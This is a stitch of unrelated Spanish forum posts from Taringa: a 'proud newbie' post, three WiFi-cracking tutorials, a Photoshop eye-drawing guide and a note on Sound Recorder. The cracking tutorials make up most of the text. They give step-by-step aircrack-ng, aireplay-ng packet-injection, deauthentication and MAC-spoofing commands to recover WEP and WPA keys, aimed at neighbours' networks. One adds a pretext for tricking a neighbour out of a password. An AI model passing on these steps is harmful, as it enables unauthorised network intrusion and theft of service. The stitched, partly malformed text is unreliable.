GabrielXabra

Bueno este post lo hago porque mucha gente en Taringa hace post con la finalidad de ser New Full User, O NFU... Pues en mi caso yo los invito a ser orgullosos de ser novatos Taringeros porque esta comunidad se hiso para ayudar, el echo de que a la izquierda de la pantalla diga Novato no signifca que no tengamos experiencia.. es mas, muchos de nostros tenemos mas experiencia que cualquier otra persona que sea hasta Gold User xD, por ejemplo yo me considero un crack en computacion.. puedo ser muy util en taringa y por eso, esque e echo este foro.. para que se sientan orgullosos y salgan a TARINGEAR! Tambien cree una insignia al Orgullo de Novato Insignia del novato: Le puse una N estilo tribal que es la inicial para Novato, Un novato no es el de menos experiencia si no el nuevo, y si somos nuevos eso significa que estamos listos para aprender o mejor dicho para ensenar, se supone que si entramos en taringa es porque tenemos experiencia en algo y le transmitiremos a los demas.. Hasta un gold member puede buscar una info que el no sepa y aprendera del post del novato.. xD! Mi meta: Mi meta es ser uno de los reconocidos de taringa, pero ser reconocido como Un Novato no como un NFU, GU, SU, ETC. espero que piensen igual o que aunquesea me apollen!

El día de hoy, vamos a ver como sacar contraseñas WiFi, en este caso una contraseña con encriptación WEP. Lo primero que debemos hacer es descargar Backtrack 3. Luego grabamos la imagen en un CD, para esto podemos utilizar un programa gratuito como ISO recorder 2.0. Una vez con el cd grabado, reiniciamos el computador y ponemos el cd para que arranque BackTrack 3. Luego abrimos una consola (shell) con el icono que está al lado de la “K” de la esquina inferior izquierda. Detenemos nuestra tarjeta de Red (En este caso una Atheros por lo tanto es ath0) Escribimos: airmon-ng stop ath0 Para continuar, cambiamos nuestra MAC (Media Access Control), para ser “ocultados”. Escribimos: macchanger -m 11:22:33:44:55:66 wifi0 Iniciamos nuestra tarjeta de Red en modo Monitor. Escribimos: airmon-ng start wifi0 Ahora nos aseguraremos que todo vaya bien, revisaremos la MAC cambiada y que la tarjeta esté en modo Monitor. Escribimos: iwconfig Ahora, a revisar si hay redes cerca nuestro. Escribimos: airodump-ng wifi0 Anotemos datos muy importantes de la pantalla anterior, como lo son: La MAC de la red (BSSID) El canal por donde se transmite la red WiFi (CH) El nombre de la red (ESSID) Presionamos CTRL+C y así se detendrá la búsqueda de redes cercanas. Luego escribimos: airodump-ng –channel X –write XXX ath0 x= Canal (CH) xxx= Nombre para guardar el archivo con información, pongan cualquier nombre, en este caso “pass” Para este ejemplo sería: airodump-ng –channel 5 –write pass ath0 Ahora abrimos otra ventana de consola (Shell). Escribimos lo siguiente: aireplay-ng -3 -b (mac de la red) -h (nuestra mac) ath0 Volvemos a abrir otra ventana de consola (Shell) Ahora escribimos: aireplay-ng -1 0 -e (ESSID) -a (BSSID) -h (nuestra mac) ath0 Ahora debemos esperar a que se obtenga la información suficiente como para saber la contraseña de la red, para esto tenemos que esperar a que los ARP sean altos (más de 50.000). Una vez que tengamos suficiente información (lo sabrás con experiencia, muchos intentos, todo depende de la dificultad de la contraseña), cancelamos lo que teníamos andando presionando CTRL+C en cada consola (Shell). Luego iniciamos otro programa para que desencripte la contraseña. Escribimos: Aircrack-ng pass-01.cap Finalmente, ya tenemos la contraseña de la red. BackTrack 3 ha funcionado. Cualquier duda que tengan, escríban aquí, les ayudaremos con todo. Saludos!

Tengo otro tutorial... pero es con otro programa para WEP. AQUI TIENES EL TUTORIAL: Este es un manual orientado para quienes ya hayan utilizado alguna vez una distribución de GNU/Linux y conozcan algunos comandos básicos. Si eres un usuario experimentado de Linux, no encontrarás nada nuevo y mejor busca en otro lugar. Este es un manual dedicado a aquellas personas que han usado Linux algunas veces y que tienen un conocimiento básico del sistema. No queremos Trolls aquí. La información es expuesta únicamente con fines didácticos. Debes conocer también cómo grabar ISOs. Puedes investigar en google como hacerlo. Insisto: No se te ocurra meterte contra un banco, contra el vecino, contra la suprema corte, u organizaciones pesadas porque en serio, en serio, ¡¡¡en serio!!! puede irte muy mal. Haz estas cosas bajo TU propio riesgo. ¿Qué es wifiway? Wifiway es un live CD que, basado en el sistema operativo Linux, puede ser ejecutado sin necesidad de instalación directamente desde el CDROM o también desde el disco duro como LiveHD, además de poderse instalar en memorias USB o en disco duro. Wifiway es un linux live cd diseñado por www.seguridadwireless.net esta adaptado para el wireless y ademas con soporte internacional. No esta basado en debian, mandriva, fedora ni slax, este es un proyecto creado con linuxfromscratch. El live cd fue creado con las Linux-live-scripts. Nota legal: La utilización de este software de análisis inalámbrico debe ser una herramienta básica para profesionales y usuarios que, a la larga, conocerán el nivel de seguridad de sus instalaciones inalámbricas. El uso de la misma con otros fines está totalmente prohibido. Deben tener una tarjeta de red inalámbrica que sea Intel, o Broadcom. Si tienes alguna otra pruébala, aunque no te garantizo que funcione. Un detalle muy importante. NO todas las tarjetas de red inalámbricas son compatibles con la inyección de tráfico. En un principio eran pocas las tarjetas compatibles, y al paso del tiempo, se les ha dado soporte a las demás. En mi caso, yo tengo una tarjeta de red inalámbrica con chipset Broadcom, y me funciona. Si a ti no te funciona, es que aún no existe soporte para tu tarjeta de red inalámbrica. También ya deberías saber checar la MD5 contra la ISO. Una vez listos, procedemos. Mete el CD donde grabaste la ISO de Wifiway 1.0 a la unidad de CD de tu máquina y arranca con el CD. No te voy a dar detalles de cómo hacer que la maquina arranque desde el CD, eso ya deberías saberlo. Busca en Google si tienes dudas. Si ya has usado alguna distribución de Linux, las preguntas que te hace el sistema al arrancar ya deberías saber responderlas. Cuando termina de cargar, aparece un menú que dice “startx”, “autox”, “kde”, etc. Yo les recomiendo que escriban “kde”. Lo recomiendo porque con ese gestor de ventanas hice las imágenes que verán a continuación. Cuando Wifiway ya terminó de cargar la interfaz KDE, veremos una pantalla parecida a la siguiente paso01 Den clic en el Menú K, luego seleccionan el menú Wifiway, luego se van a Suite Aircrack-ng y seleccionan airmon-ng (start mode monitor). Les aparecerá la siguiente pantalla. paso02 En la ventana Start Mode Monitor, verán un dropdownlist que dice Interface, seleccionen wlan0 o ath0 y presionen el botón Aplicar. NOTA: Si no les aparece el elemento wlan0, significa que no fue detectada tu tarjeta de red inalámbrica y no puede inyectar tráfico. Cuando des clic en el botón Aplicar, aparecerá la pantalla en negro que se ve en la imagen Si la ventana en negro les dice (monitor mode enabled on mon0), significa que la tarjeta de red inalámbrica fue correctamente configurada para inyectar tráfico falso y podemos continuar. Cierren ambas ventanas. Ahora que no hay ninguna ventana abierta, presiona otra vez en el Menú K, luego Wifiway, luego Wireless, y busca un programa llamado airoscript new (spain). Dale clic [paso02-5] paso02-5 Te aparecerá una ventana de color negro con algún texto Este texto desaparecerá después de algunos segundos paso03 Cuando ha desaparecido el texto en la ventana de color negro te pregunta por la resolución de tu pantalla. Presiona el número 2, para elegir 800×600, o 1 para elegir 640×480. [ paso04 Ahora, en la siguiente pantalla te está preguntando en que tarjeta de red va a leer datos. Selecciona la que diga mon0, en el ejemplo, mon0 le corresponde el numero 4. Presiona el 4 y da enter. paso05 En esta pantalla te aparece un menú. Selecciona la opción 1. Vamos a elegir la red que queremos atacar. paso06 En la siguiente ventana Esta pantalla te está preguntando qué tipo de redes inalámbricas quieres escanear. Hay varios tipos. Wep, wpa, wpa1, wpa2, o ninguna. La mayoría de las redes están en WEP. Por ahora presiona el numero 1 porque queremos ver todas las redes detectadas. paso07 En la siguiente ventana pide que le indiquemos el canal de la red inalámbrica. Elegimos 1. paso08 En esta ventana de color azul vamos a dejar que se ejecute durante 1 minuto (máximo 2) para que detecte todas las redes inalámbricas más cercanas, y le echamos el ojo a la red que queremos atacar. A la derecha aparece el nombre de la red. Cuando haya pasado un minuto o dos, cerramos la ventana azul y nos quedaremos con la ventana de color negro (donde está el menú). paso10 En la siguiente ventana elegimos la red que queremos atacar. En este ejemplo, elegimos la red INFINITUM4243, y le corresponde el número 1 (el numero se ve a la izquierda). Elige la red que tu quieres atacar, escribiendo su número correspondiente y dale enter. paso11 A la siguiente ventana le escribimos el número 2, y le damos enter. paso12 Nuevamente nos aparece el menú Ahora ya vamos a empezar a atacar la red elegida (infinitum4243). Presionamos el número 3 y le damos enter. paso13 En esta pantalla le escribimos el número 1 y damos enter. paso14 Ahora Aparecerán 3 ventanas, y la ventana del menú quedará un poco oculta. La ventana con letras rojas, indica que la tarjeta de red inalámbrica está estableciendo comunicación con el router atacado, haciéndole creer que hay un dispositivo de red inalámbrico con autorización. La ventana con las letras verdes, está inyectando paquetes falsos al router para simular tráfico. La ventana azul de arriba, únicamente está censando cuantos datos han sido capturados. Si llega a pasar que una de las tres ventanas se cierra solita, es indicio de que físicamente el router tenga una señal muy débil. En ese caso, debemos elegir otra red. En la ventana de color azul, noten la columna que dice #Data. Esta columna es muy importante, ya que es la cantidad de datos que hemos inyectado al router. Dejemos estas tres ventanas abiertas durante uno o dos minutos (en algunos casos podría ser mas tiempo). Constantemente verifiquemos el valor que aparece en la columna #Data, y esperemos que alcance el valor de 20,000. Cuando la columna #Data pase los 20,000 datos, podemos cerrar una por una la ventana de letras rojas, la de letras verdes y la ventana de color azul. Cuando las tres ventanas estén cerradas volveremos a la ventana del menú. paso15 En la ventana del menú elegimos la opción 4, porque ya tenemos suficientes datos para poder calcular la clave de la red. paso16 Ahora en esta pantalla elegimos la opción 1 y damos enter. paso17 Se abre una ventana de color blanco A los pocos segundos esta ventana se cierra solita. paso18 Cuando la ventana de color blanco se cierra, aparecerá esta otra ventana y dejemos que trabaje por algunos minutos. paso19 A continuación, la ventana solita mostrará un mensaje como este y nos muestra la contraseña de la red inalámbrica que atacamos. En este ejemplo vemos: KEY FOUND! [20:33:99:60:38] La clave de la red son los números 20:33:99:60:38 estos números están en hexadecimal. Anotemos estos números, junto con los dos puntos y cerremos Linux y pasémonos a Windows. Si quieres conectarte a la red que atacamos usando Linux, ya sabes cómo hacerlo. paso20 Ya estando en Windows, abre la ventana para conectarte a redes inalámbricas y selecciona la red que atacamos (recuerda que era infinitum4243) Presiona sobre el botón Conectar paso21 Ahora te va a pedir la contraseña de la red En el campo de texto escribe los números que anotaste 20:33:99:60:38, pero SIN LOS DOS PUNTOS Y SIN ESPACIOS. Vas a escribir 2033996038 en ambos cuadros de texto y presionas Conectar. Después de algunos segundos, ya estarás conectado a esa red. paso22 Hemos terminado. En los comentarios me han preguntado sobre que hacer en caso de que dejemos la computadora por bastante tiempo y casi no obtengamos Data’s. En realidad hasta el momento no he sabido como resolver ese problema. Mi laptop se quemó (por un defecto de fabrica) y ya no tengo tarjeta WiFi compatible. Antes creía que no recibian paquetes era por la distancia entre el punto de acceso y tu tarjeta wifi, pero ya han aclarado en los comentarios que eso es una total falsedad. Reitero que este procedimiento debes considerarlo con fines eductativos. Es toda tu culpa si el vecino se da cuenta de que te has colgado de su internet. Podrías hacer ingeniería social: “vecino, vengo de la compañía de internet a revisar los numeritos que están debajo de su módem” y allí le robas su contraseña. Podría funcionar!!! OJO: SI ME HAGO RESPONSABLE CUANDO HACKEEN, QUIERO QUE ME LLEVEN PRESO.. XD!

TUTORIAL DE AIRCRACK PARA WEP Y PARA WPA-WPA2 con Ubuntu 8.10 y tarjeta SMCWUSB-G con chipset Zydas 1211 con driver zd1211r, y con Wifislax 3.1 ATENCION PREGUNTA: Siendo jander tanto el nombre de la red a atacar como el de el archivo de paquetes capturados, y 00:137:1D:B6:CF la MAC del punto de acceso a atacar, dígase su contraseña WEP y WPA. Antes de empezar : decir que todo funciona igual de bien en Wifislax, excepto que la tarjeta de red inalambrica usb SMCWUSB-G tuve que que quitarla y volverla a conectar una vez que estuve dentro de Wifislax, sin configuración, ni necesita drivers ni nada, simplemente quitarla y volverla a pinchar y ya la reconoce Wifislax, no hace falta ayuda chipset ni lanzadores ni ná. En ubuntu 8.10 no hay que hacer nada, ya reconoce la tarjeta y no hay que buscar drivers ni kernel ni otras cosas. Espero que le pueda ayudar a alguien con chipset zydas como a mi me ayudaron los foros, videos, tutos etc de www.foro.seguridadwireless.net , http://foro.el-hacker.com , http://www.youtube.com/watch?v=whYDVSzvJQ8 (estos tres videos recomiendo que se vean antes de empezar, sobre todo los que no tengan ni idea de auditorías y también los que les pique el gusanillo de linux) y más gracias a tantos otros que no hay espacio xd. CUATRO CONCEPTOS BASICOS : PRIMER REQUISITO IMPRESCINDIBLE : Ver el tutorial de Alfonso Cruz para sacar claves Wep SEGUNDOS REQUISITOS NO IMPRESCINDIBLES : Hay que saber, llegados a este punto, conceptos como DATA, ARP, IVS, y HANDSHAKE, SINO VUELVE A Ver el tutorial de Alfonso Cruz para sacar claves Wep Sino. Aquí te los explico yo, como siempre, en cristiano DATA : son paquetes muy buenos, muy bonitos y muy entrañables, de hecho indican que es una red que puedes auditorizar con posibles buenos resultados, los veras despues de hacer un airodum-ng. PARA AUDITORIAS WEP : NECESITAS 120.000 ARP ARP : es lo que tienes que capturar en un ataque wep, un paquete muy guai, necesitas de 40000 a 120000. IVS : son vectores de inicializacion de los paquetes que te sirven para sacar la clave wep, también necesitas 80000 o 120000, y también son para “asuntos” wep. PARA AUDITORIAS WPA-WPA2 SÓLO NECESITAS UN PAQUETE LLAMADO HANDSHAKE Y NO 120.000 COMO PARA WEP HANDSHAKE: Traducido es “apreton de manos”, o sea el momento en que ordenata y punto de acceso se “vuelven a saludar” y se mandan la clave, al reconocerse como “colegas”, ese es el momento en que el airodump captura ese preciado handshake que contiene laclave, buff mi espalda, me duele de tanto escribir xd, este preciado handshake es fundamental para el ataque wpa-wpa2, porque es el que guarda la clave wpa-wpa2, despues, simplemente hay que compararlo con el diccionario y voilà. DICCIONARIO(WORDLIST) : La pena de todo esto, infelices que habeis leído hasta aquí, es que una clave wpa-wpa2 no se puede capturar a no ser que sea del tipo manolin233 o tobi8876, o que tengas un diccionario acojonante, y de esos, desafortunadamente todavía no existen, si sabeis de alguno me lo mandais a [email protected] Ahora en serio, y último consejo: El diccionario deberá estar guardado en la carpeta donde estas haciendo todo: En Wifislax es: / root En Ubuntu la del usuario, pero vale cualquiera mientras sepas donde tienes el diccionario, lo mejor para los novatos es tener el diccionario en la misma carpeta dónde haces todo). LO DEL ATAQUE WPA-WPA2 CON CLIENTE : Vamos a ver, que como intentes atacar el router de un “amigo”, que en ese momento no tenga conectado un pc a su router y con la mula puesta, pues eso, que lo llevas claro, te llevaría siglos, o toda tu paciencia, la cual es mejor dedicar a tratar mejor a tu vecino y pedirle la clave, para que amablemente la comparta contigo y llegar juntos a pagar menos a TIMOFONICA xd. INDICE DE COMANDOS USADOS(por orden de aparición y uso): Comandos para WEP: ifconfig iwconfig ifconfig wlan0 up airmon-ng start wlan0 iwconfig ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 ifconfig mon0 up airodump-ng mon0 pulsar control-c para parar airodump airodump-ng mon0 -w jander -c 6 aireplay-ng -1 0 -e jander -a 00:137:1D:B6:CF -h 00:11:22:33:44:55 mon0 aireplay-ng -3 -b 00:137:1D:B6:CF -h 00:11:22:33:44:55 mon0 aircrack-ng jander*.cap Comandos para WPA : ifconfig iwconfig ifconfig wlan0 up airmon-ng start wlan0 iwconfig airodump-ng -c 6 --bssid 00:13:f7:1d:b6:cf -w jander mon0 aireplay-ng -0 30 -a 00:137:1D:B6:CF -c 00:21:5d:35:02:50 mon0 aircrack-ng -w dictionary_spanish.dic -0 jander*.cap Nota : el ataque se realizó sobre mi router Smcwbr-14-g, con la mula conectada desde el cliente en el caso Wpa, con un diccionario, capturando el handshake en 5 minutos. En el caso de la clave WEP, se hizo falseando la MAC con macchanger, tambien con tráfico, y en unos dos minutos empezó a inyectar como loco, en 10 minutos tenía 200000 arps xd. SACANDO CLAVE WEP 1er PASO : Configurar la tarjeta en modo monitor: AIRMON ifconfig iwconfig ifconfig wlan0 up airmon-ng start wlan0 airmon-ng start mon0 ifconfig mon0 down macchanger -m 00:11:22:33:44:55 mon0 (como explica Alfonso Cruz en sus tres magistrales videos que recomiendo ver antes de empezar a meter comandos en la consola http://www.youtube.com/watch?v=whYDVSzvJQ8 ). ifconfig mon0 up 2º PASO: Capturar paquetes: AIRODUMP airodump-ng mon0 (localizas la red y apunta su mac y su canal) control-c(Para parar el airodump) airodump-ng mon0 -w jander -c 6 (lo dejas capturando) 3er PASO: Autentificarse : AIREPLAY, en otra consola aireplay-ng -1 0 -e jander -a 00:137:1D:B6:CF -h 00:11:22:33:44:55 mon0 si la autentificacion es correcta, debe decir sucessful pasas al siguiente paso. 4º PASO : Inyectar paquetes: AIREPLAY aireplay-ng -3 -b 00:13:f7:1D:B6:CF -h 00:11:22:33:44:55 mon0 y cuando llegues a 120000 arps: 5º PASO: Buscar clave en el archivo de captura jander.cap : AIRCRACK aircrack-ng jander*.cap KEY FOUND! [ 5A:30:30:30:32:43:46:42:37:35:41:38:32 ] (ASCII: Z0002CFB75A82 ) FIN SACANDO CLAVE WAP-WAP2 1er Paso : Configurar la tarjeta :AIRMON ifconfig iwconfig ifconfig wlan0 up airmon-ng start wlan0 airmon-ng start mon0 2º Paso : Capturar paquetes: AIRODUMP airodump-ng mon0 cuando veas tu punto de acceso a atacar, control-c y en otra consola : airodump-ng -c 6 --bssid 00:137:1D:B6:CF -w jander mon0 3er Paso: Deautentificar : AIREPLAY en otra consola aireplay-ng -0 30 -a 00:137:1D:B6:CF -c 00:21:5d:35:02:50 mon0 Después de usar este comando, fijaros de vez en cuando en la pantalla del airodump, ARRIBA A LA DERECHA, y ahí debe aparecer el preciado handshake y a continuación, el 4º paso. 4º Paso : Buscar la clave en el Dicionario :AIRCRACK,en otra consola aircrack-ng -w dictionary_spanish.dic -o jander*.cap KEY FOUND! [ CF:CF:CF:CF:CF ] FIN Esperando sepan disculpar mi mala letra y los posibles errores,

1-Abrimos un nuevo documento, creamos un circulo del tamaño del ojo, lo rellenamos del color que nos guste, en este caso verde y aplicamos un filtro/ruido/añadir ruido con valores de 50/gaussiano 2- Aplicamos un nuevo filtro/desenfocar/desenfoque radial/cantidad 100/zoom/óptima. seguidamente con un pincel color negro difuso dibujamos el iris y todo el contorno del ojo. Con el mismo pincel pero en blanco le damos las luces 3- Vamos a darle filtro/distorsionar/esferizar con cantidad 100%/modo normal, para crear volumen y podemos cambiar el color del ojo a nuestro gusto en imagen/ajustes/equilibrio de color 4- La forma del ojo la creamos con las pestañas, creamos una nueva capa para cada una de las pestañas y utilizamos un pincel con forma de pestaña color negro, estos pinceles los encontrais en distintas páginas, yo lo he sacado de devianart. Es la forma mas sencilla de hacerlo. Una vez las pestañas colocadas debemos acoplarlas a la forma del ojo con edición/transformar/distorsionar y quedará algo asi 5- Para hacer el blanco del ojo, capa nueva, cogemos la herramienta lazo mágnetico y seleccionamos el interior, lo pintamos de blanco y con un pincel difuso y pequeño realizamos marcas de un color mas oscuro para manchar el blanco, seguidamente con herramienta dedo arrastramos las manchas hasta lograr una imagen que nos parezca buena 6- En una nueva capa creamos el fondo que mas nos guste, todo depende de la creatividad de cada uno y ya tenemos el ojo listo 7- para tener los dos ojos solo hay que duplicar las capas, edición/transformar/voltear horizontal, como os podeis imaginar tu ojo va a terminar asi:

Bueno este programa es solo si no saven hacerlo directamente mientras graban.. de otro modo haganlo asi.. este es un programa muy sencillo en el que solo deveremos guardar la grabacion de nuestra voz antes de hacer el video.. recomiendo hacer el video con Camtasia studio.. Bueno una vez de guardar la grabacion en el escritorio solo devemos preparar el camtasia y le damos a play y luego le damos play denuevo pero esta vez en el video con nuestra voz. Nombre de programa: Sound Recorder No dejare link para este programa porque hay muchas versiones y es muy facil de consegir entonces se los dejo a su gusto... El windows 7 ya trae este programa de echo lo descubri mientras miraba el windows 7 en mi pc , chao...!!